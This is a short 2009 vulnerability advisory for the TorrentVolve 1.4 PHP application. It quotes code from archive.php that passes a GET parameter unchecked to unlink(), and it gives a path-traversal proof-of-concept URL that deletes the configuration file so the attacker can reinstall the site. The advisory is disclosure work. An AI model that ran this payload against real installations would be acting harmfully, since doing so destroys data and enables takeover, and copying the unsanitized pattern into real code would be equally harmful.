TorrentVolve 1.4 (deleteTorrent) Delete Arbitrary File Vulnerability

2009-06-11 23:04:55

----------------------------------------------------------------------------------------------------

Name : Torrent Volve
Site : http://sourceforge.net/projects/torrentvolve/
Down : http://sourceforge.net/project/showfiles.php?group_id=179905&package_id=207933&release_id=476030

----------------------------------------------------------------------------------------------------


Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com

----------------------------------------------------------------------------------------------------

Description:

Bug : Delete Arbitrary file.

Look this in: archive.php; Lines 194 - 199

if(isset($_GET['deleteTorrent'])) {

//delete Torrent from file system
unlink($userDir . '/' . $_GET['deleteTorrent']);
echo ' <div class="divStatus">' . $_GET['deleteTorrent'] . ' deleted.</div>' . "\n";
}

Then after login we can delete files, if you delete the configuration file you can install the script again.


----------------------------------------------------------------------------------------------------

P0c:

http://localhost/Scripts/torrentvolve/archive.php?deleteTorrent=../../../config/configuration.xml

To install again go to:

http://localhost/Scripts/torrentvolve/


OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------

#

Fixes

No fixes

In order to submit a new fix you need to be registered.